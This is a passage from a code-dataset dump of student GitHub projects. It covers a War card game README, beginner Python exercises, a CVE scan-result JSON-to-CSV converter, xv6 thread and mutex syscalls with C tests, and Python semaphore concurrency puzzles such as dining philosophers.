0.7132301330566406, "alphanum_fraction": 0.7515833973884583, "avg_line_length": 41.43283462524414, "blob_id": "b8908610736ba26c5a5db7468dfd1447e732b0e1", "content_id": "7ec7fc0996e95d558b986c5f54d3fb7bae5cc4fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2846, "license_type": "no_license", "max_line_length": 263, "num_lines": 67, "path": "/README.md", "repo_name": 
"iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "# War Battle\n\nA card game for two players using Python.\n\n## Rules of the game\n\nThe objective of the game is to win all of the cards.\n\nThe deck is divided evenly among the players, giving each a down stack. In unison, each player reveals the top card of their deck—this is a \"battle\"—and the player with \nthe higher card takes both of the cards played and moves them to their stack. Aces are high, and suits are ignored.\n\nIf the two cards played are of equal value, then there is a \"war\". Both players place the next three cards of their \npile face down and then another card face-up. The owner of the higher face-up card wins the war and adds all the cards \non the table to the bottom of their deck. If the face-up cards are again equal then the battle repeats with another set \nof face-down/up cards. This repeats until one player's face-up card is higher than their opponent's.\n\n[More Info](https://en.wikipedia.org/wiki/War_(card_game))\n\n## Dependencies\n\n* **Python3**\n\n## Running the game\n\n To start a game you need to initialize a Game object with the name of the two players that are going to participate. And then run the start() function. \n \n``` python \ngame = Game([\"Luis\", \"Computer\"])\ng.start()\n```\n\nTo run the game:\n\n```\npython3 war_game.py\n```\n\n## Testing\n\nFrom the tests directory run the test you want to run.\n\n```\ntests: python3 test_game.py\n```\n\n## Notes\n\n- When there is a war battle, we remove three cards from the player's hand instead of one. This way the game will be completed faster.\n- The cards won by a player are added at the bottom of their hand without shuffling them.\n- From time to time, we will encounter a deck without War battles in them. This will make a game to last a lot of time, sometimes even infinite. I believe that this will be resolved by shuffling the cards won by a player. However, this doesn't happen very often. \n\n## TODO\n\n- **Shuffle cards won by players**. Create a deck with the cards won by a player. When their hand is empty: take the deck of cards won, shuffle them, and then add them to the player's hand. And repeat.\n- **Better logging**. Right now, we are just printing messages to the console. With a better logging feature we could have a cleaner interface for playing and testing. \n- **Better User Interface**. It will be fun to create a GUI interface or even a website that players could interact with. Maybe using Kivy or Django.\n\n## Screenshots\n\n### Running the game\n![start-war-game](https://user-images.githubusercontent.com/7850532/80838283-87abae80-8bad-11ea-9dec-f41a2a0f1555.png)\n\n### End of the game\n![end-card-game](https://user-images.githubusercontent.com/7850532/80838368-be81c480-8bad-11ea-94f6-8645006b6452.png)\n\n### Example of war battle\n![example-of-war-battle](https://user-images.githubusercontent.com/7850532/80838449-e6712800-8bad-11ea-8811-267f34d1f916.png)" } ]
6
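The check_cards logic in war_game.py above boils down to an ordinal comparison: a card's strength is its index in the shared ranks list, so suits never matter and aces are high. A standalone sketch of just that comparison rule, reusing the same rank ordering:

ranks = ['2','3','4','5','6','7','8','9','10','J','Q','K','A']  # same order as war_game.py

def battle(card1, card2):
    """Return 1 if card1 wins, 2 if card2 wins, 0 for a war (equal ranks)."""
    r1, r2 = ranks.index(card1[1]), ranks.index(card2[1])
    if r1 > r2:
        return 1
    if r1 < r2:
        return 2
    return 0

assert battle(['hearts', 'A'], ['clubs', 'K']) == 1   # aces are high
assert battle(['spades', '5'], ['hearts', '5']) == 0  # equal ranks trigger a war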
deliotclarke/henloPy
https://github.com/deliotclarke/henloPy
490a8403c81c1b39df8b106e6c8243acd199ed5a
dd3caa02ddea5bdbbf118bde9c59d1e126c626cd
dbafe746047eb6304476a98dbd975a1dc5761b89
refs/heads/master
2022-11-12T07:02:37.984869
2020-06-29T15:41:10
2020-06-29T15:41:10
275,856,421
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.633147120475769, "alphanum_fraction": 0.6672874093055725, "avg_line_length": 17.73255729675293, "blob_id": "d63ac786823d21ada37e78d275c172ab53d40410", "content_id": "356ec918db46b873caae46a287c08c5e271c024f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1611, "license_type": "no_license", "max_line_length": 74, "num_lines": 86, "path": "/henlo.py", "repo_name": "deliotclarke/henloPy", "src_encoding": "UTF-8", "text": "from numpy import array\n\nmsg = \"Henlo Snakes!\"\nprint(msg)\n\n# playing in cars with pythons\ncars = ['El Camino', 'El Camino', 'El Camino']\n\n# simple printing loop\nfor x in cars:\n print(x)\n\n# add an item to a list\ncars.append('Bob Marley')\n\n# the ol loop and print\nfor x in cars:\n print(x)\n\n# storing a value at an index in list\ny = cars[3]\n\n# you guessed it\nprint(y)\n\n# printing the length of a list\nprint(len(cars))\n\n# copy the contents of the list\ncars2 = cars.copy()\n\n# clear contents of a list\ncars.clear()\n\n# is it real?\nprint(\"cars length: \", len(cars))\nprint(\"cars 2 length: \", len(cars2))\n\n# count() stores the instances of a value in your list\nprint(\"El Camino Count: \", cars2.count(\"El Camino\"))\n\n# a dictionary!!\nthisdict = {\n \"brand\": \"Ford\",\n \"model\": \"Mustang\",\n \"year\": 1967\n}\n\n# print it\nprint(thisdict)\n\n# print just the value of a key in the dictionary\nprint(thisdict[\"model\"])\n\n# changing the value of a key in said dictionary\nthisdict[\"year\"] = 1965\n\n# sometimes you've got to print to check\nprint(thisdict)\n\n# looping a dictionary's keys\nfor x in thisdict:\n print(x)\n\n# looping a dictionary's values\nfor x in thisdict:\n print(thisdict[x])\n\n# looping both, but with a conditional to only pring if the key is \"model\"\nfor x, y in thisdict.items():\n if x is \"model\":\n print(x, y)\n\ncost = [4, 8, 12, 16, 20, 100, 120, 60, 13]\n\n# not possible with lists - going to import array from numpy to try again\n# divided_cost = cost/2\n\n# print(divided_cost)\n\n# works! super interesting\ncost2 = array([4, 8, 12, 16, 20, 100, 120, 60, 13])\n\ndivided_cost2 = cost2/2\n\nprint(divided_cost2)\n" } ]
1
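henlo.py above points out that cost/2 raises a TypeError for a plain list but works once the values live in a numpy array, because numpy broadcasts the scalar division across every element. For contrast, a sketch of the same element-wise division in plain Python with a list comprehension:

cost = [4, 8, 12, 16, 20, 100, 120, 60, 13]

# Plain lists have no vectorized math, so divide element by element.
divided_cost = [c / 2 for c in cost]
print(divided_cost)  # [2.0, 4.0, 6.0, 8.0, 10.0, 50.0, 60.0, 30.0, 6.5]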
farhatlamia/workshop8
https://github.com/farhatlamia/workshop8
bf58559130f7c05bd776b8956fb7c30d34822249
ad073261ad3a44f7158ee32fb4f6eae10d2bd339
44194300438af0452346fa2d855c82110f6235ab
refs/heads/main
2023-09-05T04:56:14.228612
2021-11-08T21:07:11
2021-11-08T21:07:11
425,993,738
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5806763172149658, "alphanum_fraction": 0.591304361820221, "avg_line_length": 19.520000457763672, "blob_id": "1e44c3054232ccce3a4eb7b0c629c7bb00631823", "content_id": "8789ad43c3736910abb57b7f7ea50a16ef3324da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1035, "license_type": "no_license", "max_line_length": 61, "num_lines": 50, "path": "/w8.py", "repo_name": "farhatlamia/workshop8", "src_encoding": "UTF-8", "text": "import json\nimport csv\n\n#load json file first\nf = open('scan.results.json')\ndata = json.load(f)\n#print(data)\n\nresult = data[\"vulnerabilities\"]\nprint(result)\n\nfinal = {}\nmylist = []\n \nfor i in result:\n cve = {}\n alerts = {}\n \n #list to string\n #alerts[\"CVE-id\"]= i[\"identifiers\"][\"CVE\"]\n cve = i[\"identifiers\"][\"CVE\"]\n alerts[\"CVE-ID\"] = ''.join(cve)\n \n #remove new line\n alerts[\"DESCRIPTION\"]= i[\"description\"].replace('\\n', '')\n \n\n alerts[\"SEVERITY\"]= i[\"nvdSeverity\"]\n mylist.append(alerts)\n final[\"workshop8\"] = mylist\n\nwith open(\"sample1.json\", \"w\") as fhandle:\n json.dump(final, fhandle, indent=4)\n \nwith open('sample1.json') as json_file:\n data1 = json.load(json_file)\n\nem_data = data1['workshop8']\n \ndata_file = open('sample1.csv', 'w')\ncsv_writer = csv.writer(data_file)\n\ncount = 0\nfor i in em_data:\n if count == 0:\n header = i.keys()\n csv_writer.writerow(header)\n count +=1\n csv_writer.writerow(i.values())\ndata_file.close()\n\n \n\n\n\n" } ]
1
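w8.py above derives its CSV header by peeking at the keys of the first record it writes. The standard library's csv.DictWriter expresses the same json-to-csv step more directly; a sketch under the same three-column record shape (the sample CVE row is made up for illustration):

import csv

records = [  # same shape w8.py builds for each vulnerability
    {"CVE-ID": "CVE-0000-0000", "DESCRIPTION": "placeholder entry", "SEVERITY": "HIGH"},
]

with open("sample2.csv", "w", newline="") as fh:
    writer = csv.DictWriter(fh, fieldnames=["CVE-ID", "DESCRIPTION", "SEVERITY"])
    writer.writeheader()   # header comes from fieldnames, not from the first row
    writer.writerows(records)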
erichysen/IIT-Classes
https://github.com/erichysen/IIT-Classes
3c1a20ee468a8c6c757686a86a9694f443d85e59
f8337bd6112115a59262ed7007b8317e7d668cb1
94e22f101e716665d0611a7162643648ce1e0283
refs/heads/master
2020-04-07T06:47:26.368291
2016-06-29T03:56:09
2016-06-29T03:56:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5773659348487854, "alphanum_fraction": 0.5874754190444946, "avg_line_length": 40.89411926269531, "blob_id": "a64df44c87b23a4180f32686c74a5ca017b6f5a4", "content_id": "5c24cb1ad9db8dceed048023f6da94a59c9480a8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3561, "license_type": "permissive", "max_line_length": 116, "num_lines": 85, "path": "/mp3/1_disc_golf_range.py", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "\"\"\"Hard coded variables are on lines 27-29. Just run with Python3 1_disc_golf_range.py\"\"\"\nfrom threading import Semaphore, Thread\nfrom time import sleep\nimport random\n\"\"\"\nUNSYNC CODE\n# frolfer\nwhile True:\n stash -= N # call for bucket\n for i in range(0,N): # for each disc in bucket,\n discs_on_field += 1 # throw (maybe simulate with a random sleep)\n\n# cart\nwhile True:\n stash += discs_on_field # collect discs and deposit in stash\n\"\"\"\n\nrand = random.Random()\n#rand_num = rand.seed(100)\n\nMAX_CART_RUNS = 10 #change this to number of times cart can fetch discs currently IS [IS NOT] in use.\n\nclass frolf_game:\n\tdef __init__(self):\n\t\t#self.discs = 0 not needed\n#***************************************#\n\t\tself.frolfers = 3 #frolfers playing\t\n\t\tself.stash = 20 #20 discs in the stash\n\t\tself.bucket= 5 #5 discs per bucket\n#***************************************#\n\t\tself.thrown = 0 #discs thrown\n\t\tself.cart_cycles=0 ##times cart has fetched discs \n\t\ngame=frolf_game()\nmutex = Semaphore(1) \t\t\t\t\t\t\t\t\t#for changing frolf_game attributes\ncart = Semaphore(0)\nstash_empty = Semaphore(0) \nthrowing = Semaphore(1)\t\t\t\t\t\t\t\t\t#protect multiple player threads from throwing and modifying thrown disc shared data\n\ndef player_thread(player):\n\tglobal game\n\trand.seed(100) \t\t\t\t#rand number seed\n\trand_num=rand.random() \n # while(game.cart_cycles<MAX_CART_RUNS): \t\t\t#change condition to true for infinite looping\n\twhile(1):\n\t\tmutex.acquire() \t\t\t# block from other threads changing frolf_game vars\n\t\tprint('Frolfer',player,'calls for the bucket.')\n\t\tif game.stash >= game.bucket: #first frolfer calls for the bucket\n\t\t\tgame.stash = game.stash-game.bucket \t\t#fix stash after bucket filled\n\t\t\tprint('Frolfer',player,'got',game.bucket,'discs; ','Stash = ',game.stash)\n\t\telse:\n\t\t\tstash_empty.release() \t\t#stash empty, permit cart to refill. Block throwing.\n\t\t\tcart.acquire() \n #print(\"debug\")\n\t\t\tgame.stash = game.stash-game.bucket\t\t\t#fix stash after bucket filled\n\t\t\tprint('Frolfer',player,'got',game.bucket,'discs;','Stash = ',game.stash)\n\t\tmutex.release() \t\t\t#permit modification of frolf_game variables\n\t\tfor i in range(game.bucket): \n\t\t\tthrowing.acquire() \t \t\t\t#block to avoid thrown disc contention between frolfers\n\t\t\tprint('Frolfer',player,'threw disc:',i)\n\t\t\tgame.thrown +=1\t\t\t\t\t\t\t\t#cs\n\t\t\tthrowing.release() \t\t\t\t#unblock for other throwers. 
Can be preempted in loop for concurrent throwing.\n\t\t\tsleep (rand_num)\n\ndef cart_thread(): \t\t #blocks throwers from throwing while reclaiming thrown discs.\n\tglobal game\n\t#while(game.cart_cycles<MAX_CART_RUNS): \n \t\t\t\t\t\t\t\t\t\t\t\t#^can be replaced with 1 to continue forever.\n\twhile(1):\n\t\tstash_empty.acquire()\n\t\tprint('################################################################################')\n\t\tprint('Stash = ', game.stash,'disc[s];',' Cart entering the field!')\n\t\tgame.stash += game.thrown\n\t\tprint('Cart done, gathered ',game.thrown,' discs; ','Stash =',game.stash, 'discs.')\n\t\tgame.thrown = 0\n\t\tprint('################################################################################')\n\t\tgame.cart_cycles+=1\t\t\t\t\t\t\t\t#debug\n\t\tcart.release() \t\t\t\t#only cart\n\nif __name__ == '__main__':\n\tc = Thread(target= cart_thread)\n\tc.start() \n\tfor i in range (game.frolfers):\t\t\t\t\t\t#thread for each player\n\t\tp = Thread(target=player_thread,args=[i]) \n\t\tp.start()\n" }, { "alpha_fraction": 0.5991639494895935, "alphanum_fraction": 0.6196005344390869, "avg_line_length": 12.626582145690918, "blob_id": "4336aca5504e5232784d22c50f36201695b0cb57", "content_id": "3e1be80270b108b674debfc3eb9ac36284092e19", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2153, "license_type": "permissive", "max_line_length": 93, "num_lines": 158, "path": "/sysproc.c", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "#include \"types.h\"\n#include \"x86.h\"\n#include \"defs.h\"\n#include \"param.h\"\n#include \"memlayout.h\"\n#include \"mmu.h\"\n#include \"proc.h\"\n\nint\nsys_fork(void)\n{\n return fork();\n}\n\nint\nsys_exit(void)\n{\n exit();\n return 0; // not reached\n}\n\nint\nsys_wait(void)\n{\n return wait();\n}\n\nint\nsys_kill(void)\n{\n int pid;\n\n if(argint(0, &pid) < 0)\n return -1;\n return kill(pid);\n}\n\nint\nsys_getpid(void)\n{\n return proc->pid;\n}\n\nint\nsys_sbrk(void)\n{\n int addr;\n int n;\n\n if(argint(0, &n) < 0)\n return -1;\n addr = proc->sz;\n if(growproc(n) < 0)\n return -1;\n return addr;\n}\n\nint\nsys_sleep(void)\n{\n int n;\n uint ticks0;\n \n if(argint(0, &n) < 0)\n return -1;\n acquire(&tickslock);\n ticks0 = ticks;\n while(ticks - ticks0 < n){\n if(proc->killed){\n release(&tickslock);\n return -1;\n }\n sleep(&ticks, &tickslock);\n }\n release(&tickslock);\n return 0;\n}\n\n// return how many clock tick interrupts have occurred\n// since start.\nint\nsys_uptime(void)\n{\n uint xticks;\n \n acquire(&tickslock);\n xticks = ticks;\n release(&tickslock);\n return xticks;\n}\n\n//MP1 Additions\nint\nsys_start_burst(void){\n\tint sb = sys_uptime();\n\treturn sb;\n}\nint\nsys_end_burst(void){\n\tint eb = sys_uptime();\n\treturn eb;\n}\nint \nsys_print_bursts(void){\n\tint i;\n\tfor (i=0; i<100; i++){\n\t\tif(proc->burst_array[i] !=0x00){\n\t\t\tcprintf(\"%d,\", proc->burst_array[i]); //print bursts\n\t\t}\n\t}\n\tcprintf (\"Turnaround Time:%d\", sys_end_burst() - proc->turn_burst); // print turnaround time\n\tcprintf(\"\\n\");\n\treturn 0;\n}\n//end mp1 additions\n\n// mp2 additions\nint\nsys_thread_create(void)\n{\n\t//(void*)tmain\n\tchar *tmain, *stack, *arg;\n\targptr(0,&tmain,1); //line 45 syscall.c\n\targptr(1,&stack,0);\n\targptr(2,&arg,0);\n\treturn thread_create((void*)tmain, (void*)stack, (void*)arg);\n}\n\nint\nsys_thread_join(void)\n{\n\tchar *stack;\n\targptr(0,&stack,1);\n\treturn thread_join((void**)stack);\n}\n\nint 
\nsys_mtx_create(void)\n{\n\tint locked;\n\targint(0,&locked);\n\treturn mtx_create(locked);\n}\nint\nsys_mtx_lock(void)\n{\n\tint lock_id;\n\targint(0,&lock_id);\n\treturn mtx_lock(lock_id);\n}\nint\nsys_mtx_unlock(void)\n{\n\tint lock_id;\n\targint(0,&lock_id);\n\treturn mtx_unlock(lock_id);\n}\n//end mp2 additions\n" }, { "alpha_fraction": 0.535556972026825, "alphanum_fraction": 0.5607300400733948, "avg_line_length": 17.09677505493164, "blob_id": "29449c951f6270a4ad2757bc8dc53a5379700dea", "content_id": "f02d209f12c3f786b23ebe8262c93bbe0edb0cc3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1589, "license_type": "permissive", "max_line_length": 62, "num_lines": 93, "path": "/prod_con_test.c", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "#include\"types.h\"\n#include\"user.h\"\nstruct yard \n{\n\tint trees;\n\tint stumps;\n\tint acre[15]; //it's a prairie: 1 tree||stump per acre.\n}yard;\n\nstatic int mutex;\n\n//plant trees in acres where there are stumps \n//producer\nvoid plant_trees (void*arg)\n{\n\tint i, j; \n\tj = 0;\n\tyard.stumps = 15; //initialize the stumps once, not on every pass\n\tfor(i = 0; i < 15; i++)\n\t{\n\t\tmtx_lock(mutex);\n\t\tif(yard.stumps == 0)\n\t\t{\n\t\t\tmtx_unlock(mutex);\n\t\t\tsleep(1);\n\t\t} \n\t\telse \n\t\t{\n\t\t\tif(yard.acre[j] == 0)\n\t\t\t{\n\t\t\t\t//printf(\"Planted tree in acre %d\\n\", i);\n\t\t\t\tprintf(1,\"Planted tree in acre %d\\n\", i);\n\t\t\t\tyard.acre[j] = i;\n\t\t\t\tyard.trees ++;\n\t\t\t\tyard.stumps --;\n\t\t\t}\n\t\t\tj++;\n\t\t\tmtx_unlock(mutex);\n\t\t}\n\t}\n\texit();\n}\n\n//chops trees that have been planted\n//consumer\nvoid chop_trees (void*arg)\n{\n\tint i,j;\n\tint spot;\n\tspot =0; \n\tfor(j=0; j < 15; j++) //15 acres; sizeof(yard.acre) would count bytes, not elements\n\t{\n\t\tif(yard.acre[j]!=0)\n\t\t{\n\t\t\tspot = spot +1;\n\t\t}\t\t\n\t}\n\tfor(i = 0; i < 15; i++)\n\t{\n\t\tmtx_lock(mutex);\n\t\tif(yard.trees == 0)\n\t\t{\n\t\t\tmtx_unlock(mutex);\n\t\t\tsleep(10); //force c switch\n\t\t}\t \n\t\telse \n\t\t{\n\t\t\tif(spot>=0)\n\t\t\t{\n\t\t\t\t//printf(\"Chopped tree in acre %d\\n\", yard.acre[spot]);\n\t\t\t\tprintf(1,\"Chopped tree in acre %d\\n\", yard.acre[spot]);\n\t\t\t\tyard.acre[spot] = 0;\n\t\t\t\tyard.trees --;\n\t\t\t\tyard.stumps ++;\n\t\t\t}\n\t\t\tspot--;\n\t\t\tmtx_unlock(mutex);\n\t\t}\n\t}\n\texit();\n}\n\nint main(int argc, char**argv)\n{\n\tmutex = mtx_create(0);\n\tuint* stack = malloc(1024); //stack size 1024 (assumed)\n\tthread_create(*plant_trees,stack,(void*)0); //producer thread\n\tthread_join((void*)0);\n\tthread_create(*chop_trees,stack,(void*)0); //consumer thread\n\tthread_join((void*)1); \n\texit();\n\treturn 0;\n}" }, { "alpha_fraction": 0.5560253858566284, "alphanum_fraction": 0.5778717398643494, "avg_line_length": 18.933332443237305, "blob_id": "222eabe198b7e706f03c30abf50d17e544016b1f", "content_id": "2f4691b702f6c1e6279fa380f7e687c81fbdda06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1419, "license_type": "permissive", "max_line_length": 69, "num_lines": 75, "path": "/threadtest_sglstack.c", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "#include \"types.h\"\n#include \"user.h\"\n#include \"syscall.h\"\n\n#define NUM_ELEMENTS 100\n\nint mutex;\n\nunsigned short lfsr = 0xACE1u;\nunsigned bit;\n\nunsigned rand() {\n\tbit = ((lfsr >> 0) ^ (lfsr >> 2) ^ (lfsr >> 3) ^ (lfsr >> 5) ) & 1;\n\treturn lfsr = (lfsr >> 1) | (bit << 15);\n}\n\nvoid producer(void *arg) {\n\tint *buffer = (int *)arg;\n\tint 
p;\n\t\n\tfor (p = 0; p < NUM_ELEMENTS; p++) {\n\t\tmtx_lock(mutex);\n\t\tbuffer[p] = rand();\n\t\tprintf(1, \"Producer put %d\\n\", buffer[p]);\n\t\tmtx_unlock(mutex);\n\t\t\n\t\tif (p == (NUM_ELEMENTS / 2)) {\n\t\t\tsleep(100);\n\t\t}\n\t}\n\t\n\texit();\n}\n\nvoid consumer(void *arg) {\n\tint *buffer = (int *)arg;\n\tint c;\n\t\n\tmtx_lock(mutex);\n\t\n\tprintf(1, \"Consumer has: [\");\n\tfor (c = 0; c < NUM_ELEMENTS; c++) {\n\t\tif (buffer[c] != -1) {\n\t\t\tprintf(1, \"%d, \", buffer[c]);\n\t\t\tbuffer[c] = -1;\n\t\t}\n\t}\n\tprintf(1, \"]\\n\");\n\t\n\tmtx_unlock(mutex);\n\t\n\texit();\n}\n\nint main(int argc, char *argv[]) {\n\tmutex = mtx_create(0);\n\tvoid (*consumerPtr)(void *) = &consumer;\n\tvoid (*producerPtr)(void *) = &producer;\n\tint *main_buffer = (int *)malloc(NUM_ELEMENTS * sizeof(int));\n\t\n\tmemset(main_buffer, -1, NUM_ELEMENTS * sizeof(int));\n\t\n\tuint *stack = (uint *)malloc(1024);\n\tvoid *return_stack;\n\t\n\tthread_create(producerPtr, (void *)stack, (void *)main_buffer);\n\tthread_join((void **)&return_stack);\n\t\n\tthread_create(consumerPtr, (void *)stack, (void *)main_buffer);\n\tthread_join((void **)&return_stack);\n\n\tfree(return_stack);\n\t\n\texit();\n}" }, { "alpha_fraction": 0.5977205038070679, "alphanum_fraction": 0.6033258438110352, "avg_line_length": 32.24844741821289, "blob_id": "9f103c180ae48a306dc0646468743027adde9ca7", "content_id": "eb79e69d11811706426ddad3c8671144e4de216c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5352, "license_type": "permissive", "max_line_length": 115, "num_lines": 161, "path": "/mp3/3_philosophers.py", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "\"\"\"Hard coded variables are on lines 11-12. Just run with Python3 3_philosophers.py\"\"\"\nfrom threading import Semaphore, Thread\nimport time\nfrom time import sleep\nimport timeit\nimport random\n\nrand = random.Random()\nrand.seed(100)\n#***************************************#\nnum_philosophers = 5\nmeals = 5\n#***************************************#\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\"\"\"each philosopher shares his left and right fork with neighbor. 
get fork and put fork\nboth use the sharing concept to modify individual fork mutexes even though there is only 1 per\nphilosopher to prevent multiple users from using a fork at the same time.\"\"\"\nclass Philosopher:\n    def __init__(self, num):\n        self.mutex = Semaphore(1)\n        self.lfork = num\n        self.rfork = (num-1) % num_philosophers\n        self.state = \"THINKING\"\n    def __repr__(self): # debug print; __repr__ must return a string\n        return str(self.lfork)\n\ndef get_forks(p): #right first\n    philosophers[int(philosophers[p].rfork)].mutex.acquire()\n    philosophers[int(philosophers[p].lfork)].mutex.acquire()\n\ndef put_forks(p):\n    philosophers[int(philosophers[p].rfork)].mutex.release()\n    philosophers[int(philosophers[p].lfork)].mutex.release()\n    \n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\"\"\"\nFootman\n\nThe \"footman\" solution: where a single semaphore (a multiplex) limits the number of \nphilosophers that can simultaneously \"try\" to dine.\n\"\"\"\nfoot = Semaphore((num_philosophers-1)%num_philosophers) #limit number of philosophers that can try to dine\ndef get_left_forks(p) : #left first (same as previous get_forks except acquires l.fork first)\n    philosophers[int(philosophers[p].lfork)].mutex.acquire()\n    philosophers[int(philosophers[p].rfork)].mutex.acquire()\n    \ndef footman_thread(p):\n    rand_num = rand.random()\n    num_meals=0 \n    while num_meals!=meals:\n        foot.acquire()\n        get_forks(p)\n        num_meals +=1\n        sleep (rand_num)\n        put_forks(p)\n        foot.release()\n\ndef Footman() :\n    footman_array=[] \n    start = timeit.default_timer()\n    for i in range(num_philosophers):\n        f_thread = Thread(target=footman_thread, args=[i])\n        f_thread.start()\n        footman_array.append(f_thread)\n    for thread in footman_array:\n        thread.join()\n    stop = timeit.default_timer()\n    print ('1.Footman solution, time elapsed:',str(stop - start)+'s')\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\"\"\"\nLeft-handed\n\nThe \"left-handed philosopher\" solution: where one of the philosophers attempts to \npick up his left fork first (whilst all other philosophers start with their right).\n\"\"\"\ndef left_handed_thread(p):\n    rand_num = rand.random()\n    num_meals=0\n    while num_meals!=meals:\n        if p==0 :\n            get_left_forks(p)\n            sleep (rand_num)\n        else : \n            get_forks(p)\n            sleep (rand_num)\n        num_meals +=1 \n        put_forks(p)\n    \ndef Left_handed() :\n    lefthand_array=[]\n    start = timeit.default_timer()\n    for i in range(num_philosophers):\n        lh_thread = Thread(target=left_handed_thread, args=[i])\n        lh_thread.start()\n        lefthand_array.append(lh_thread)\n    for thread in lefthand_array:\n        thread.join()\n    stop = timeit.default_timer()\n    print ('2.Left-handed solution, time elapsed:',str(stop - start)+'s')\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\"\"\"\nTanenbaum\n\nThe Tanenbaum solution: which has philosophers re-checking forks for neighboring, \nhungry philosophers.\n\"\"\"\nmutex = Semaphore(1)\n\ndef get_fork_t(p): #similar to get_fork except tests for adjacent philosophers for their forks\n    mutex.acquire()\n    philosophers[p].state = 'HUNGRY'\n    test(p)\n    mutex.release()\n    \ndef put_fork_t(p): #similar to put_fork except starts test to see if neighbors are able to eat after p is done\n    mutex.acquire()\n    philosophers[p].state = 'THINKING'\n    test((p+num_philosophers-1)%num_philosophers) #left neighbor\n    test((p+1)%num_philosophers) #right neighbor\n    mutex.release()\n    \n# test to see if the neighbours are eating\ndef test(p):\n    if philosophers[p].state=='HUNGRY' and philosophers[(p+num_philosophers-1)%num_philosophers].state!='EATING' \\\n 	
and philosophers[(p+1)%num_philosophers].state!='EATING':\n philosophers[p].state='EATING'\n \ndef tanenbaum_thread(p):\n rand_num = rand.random()\n num_meals = 0\n while num_meals != meals:\n get_fork_t(p)\n sleep(rand_num)\n num_meals+=1\n put_fork_t(p)\n\ndef Tanenbaum() :\n tannenbaum_array=[]\n start = timeit.default_timer()\n for i in range(num_philosophers):\n t_thread = Thread(target=tanenbaum_thread, args=[i]) \n t_thread.start()\n tannenbaum_array.append(t_thread)\n for thread in tannenbaum_array:\n thread.join()\n stop = timeit.default_timer()\n print ('3.Tanenbaum\\'s solution, time elapsed:',str(stop - start)+'s')\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\n# main function\nif __name__ == '__main__':\n philosophers = []\n for i in range (num_philosophers):\n philosophers.append(Philosopher(i))\n print(\"Running dining philosophers simulation:\", num_philosophers,\"philosophers,\",meals, \"meals each.\")\n Footman()\n Left_handed()\n Tanenbaum()" }, { "alpha_fraction": 0.5591692924499512, "alphanum_fraction": 0.5660266280174255, "avg_line_length": 29.933332443237305, "blob_id": "bf5ab431b4170fdbeec9c068cc99999fbb7f4999", "content_id": "7d49f8aa4594a722afed1fc2658e1a4eb1d10529", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5104, "license_type": "permissive", "max_line_length": 110, "num_lines": 165, "path": "/mp3/2_dance_mixer.py", "repo_name": "erichysen/IIT-Classes", "src_encoding": "UTF-8", "text": "\"\"\"Hard coded variables are on lines 9-11. Just run with Python3 2_dance_mixer.py\"\"\"\nfrom threading import Semaphore,Thread\nimport time\nfrom time import sleep\nimport random\nfrom itertools import cycle\nfrom collections import deque\n#***************************************#\nnum_leaders = 3\nnum_followers = 5\nsong_length = 5\n#***************************************#\npair = [None]*2\nrand = random.Random()\nrand.seed(100)\n\nclass ballroom:\n def __init__(self):\n self.song_time = song_length\n self.music_list = ['Dubstep','Taylor Swift','Michael Jackson','Livin La Vida Loca']\n self.dancing = Semaphore(0)\n self.waiting = Semaphore(0)\n self.leaderSem = Semaphore(0)\n self.followerSem = Semaphore(0)\n self.mutex = Semaphore(1)\n self.dancers = 0\n self.closed = True\n self.music_on = True\nbr = ballroom()\n\ndef open_floor():\n br.dancing.release()\ndef close_floor():\n br.dancing.acquire()\n br.waiting.acquire()\ndef enter():\n br.dancing.acquire()\n br.mutex.acquire()\n br.dancers += 1\n br.mutex.release()\n br.dancing.release()\ndef line_up():\n br.mutex.acquire()\n br.dancers -= 1\n if br.dancers == 0 and br.closed:\n br.waiting.release()\n br.mutex.release()\n\nclass dance_queue:\n global br\n leader_queue = deque()\n follower_queue = deque()\n leaders = Semaphore(0)\n followers = Semaphore(0)\n def append(type, waitingSem):\n if type == \"Leader\":\n dance_queue.leader_queue.appendleft(waitingSem)\n dance_queue.leaders.release()\n else:\n dance_queue.follower_queue.appendleft(waitingSem)\n dance_queue.followers.release()\n def pop():\n dance_queue.leaders.acquire()\n dance_queue.followers.acquire()\n popped_leader = dance_queue.leader_queue.pop()\n popped_leader.release()\n popped_follower = dance_queue.follower_queue.pop()\n popped_follower.release()\n\nclass Dancer:\n def __init__(self, num, type):\n global br\n self.type = type\n self.num = num\n self.waitingSem = Semaphore(0)\n self.partner = None\n if type == \"Leader\": #leader wait\n self.arrivedSem = 
